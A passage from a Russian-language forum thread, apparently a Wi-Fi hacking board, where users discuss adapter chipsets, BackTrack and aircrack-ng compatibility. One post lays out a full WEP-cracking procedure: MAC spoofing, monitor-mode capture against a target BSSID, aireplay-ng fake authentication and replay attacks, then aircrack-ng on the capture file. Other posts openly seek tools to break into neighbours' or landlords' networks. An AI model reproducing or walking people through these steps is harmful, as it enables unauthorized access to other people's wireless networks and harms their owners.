Никаких микросхем в нём не отпаивал, мак меняется в ВТ4 предфинальной и Windows XP без проблем. Под Windows XP используй как точку доступа есть специальный софт, скорость линка составляет 2,9 мегабайта в сек. при сигнале 100 %.
Наверное только покупать внешний. У меня тоже такой же чипсет rt2860. В BT3 не получилось. Попробую на днях в BT4. Но судя по твоему посту у меня ничего не выйдет Как только протестирую отпишусь тут.
ок я собственно попробовал bt3, не получилось, и попробовал компитьнуть дрова с сайта(в 4ке), тоже не прокатило(
сть карточка ASUS WL-167G. На сайте aircrack-ng нашел ,что эта прога работает с этой карточкой тока из - под линя.Линь мне не охота ставить ,поэтому возникает вопрос : как настроить wi-fi адаптер для работы из-под венды с aircrack-ng? спасибо за ответы!
А он и не увидит, это их стандартная проблема))) ладно, шучу, вот решение твоей проблемы: http://forum.eeeuser.com/viewtopic.php?id=36223
Здрасте. Я в хаке wifi не ламер. мой прошлый nick - _SEREGA_. Так вот чтобы провести чоп-чоп атаку. надо прежде ассоциироваться с ТД. в бактраке 3 финал - всё было без проблем, а вот в бактраке 4 финал я делаю всё стандартным образом, но на попытку асоссоцииации с ТД я получаю вот это и так повторяется всё время... в чём трабла? в третем всё зашибись было! а карта у меня broadcom4312 пс надеюсь есть знающие люди
На БТ-4 надо делать fragment atack вроде так это называется. Сперва меняем мак. airmon-ng stop wlan0 ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 сканируем эфир: airodump-ng mon0 выбираем точку и останавливаем airodump-ng // airmon-ng stop mon0 подсаживаемся на канал : airmon-ng start wlan0 11 и запускаем airodump-ng / на сбор пакетов airodump-ng -c 11 -w wep --bssid 11:44:98:56:77:44 mon0 атакуем : подставляем свой изменённый мак при атаке : -h 00:11:22:33:44:55 aireplay-ng -1 0 -a 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0 в другом окне делаем fragment atack aireplay-ng -3 -b 11:44:98:56:77:44 -h 00:11:22:33:44:55 mon0 открываем ещё окно и атакуем с фильтрацией нужных пакетов: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 00:11:22:33:44:55 ждём предложения на открытие пакета : получив его отрываем fragment paket Y запускаем aircrack-ng aircrack-ng wep-01.cap
есть у каво eee s101 ? мужики помогите, ноут asus s101h пытаюсь менять МАК на wifi он меняется но после этого немогу подключиться ни к одной точке доступа даже к своей, пишет что то навроде вы не в зоне действия сети попробуйте обновить список (менял в свойствах адаптера и специальными прогами такая же фигня), фильтрации по МАКам на точках нет, что это может быть? можеть есть какая нибудь хитрость? это всё под Вин. В Линухе подключаться к точке пробовал даже с реальным маком но неполучается
.... Здаравствуйте =) Мне нужна ваша помощь у меня ноут HP ProBook 4510s, карточка там Broadcom, смогу ли я на нём работать с AiroWizard??? Зарание спасибо =)
Всем привет. Ноут Asus Pro5DAB Atheros AR9285 802.11b/g Wireless Network Adapter PCI Есть ли какой-то софт под это дело чтобы вай-фай коцать? Перерыл гугл ниче не нашел толкового. В основных программах поддержки моего адаптера нет. Такого острого вопроса с нетом не стояло, поэтому когда ноут брал не обратил внимание на это. А счас в Англию жить еду, а там нет проблемно подключать на съемную хату. Спасибо всем.
есть пару вопросов) что в конце подставлять в 00:00:00:00:00:00 и FF:FF:FF:FF:FF:FF? пакеты идут во всех окнах, какие учитывать?
b/g/n он . я тоже обладатель данного девайса , и тоже ощутил проблему с win программами зато в linux все тип топ , но пока только осваиваю .
Установил... Но вот он не сканирует ((( Нажимаю Start Monitoring и оно 1 секунду работает и сразу вырубается((((( Что можете подсказать по этому поводу?=)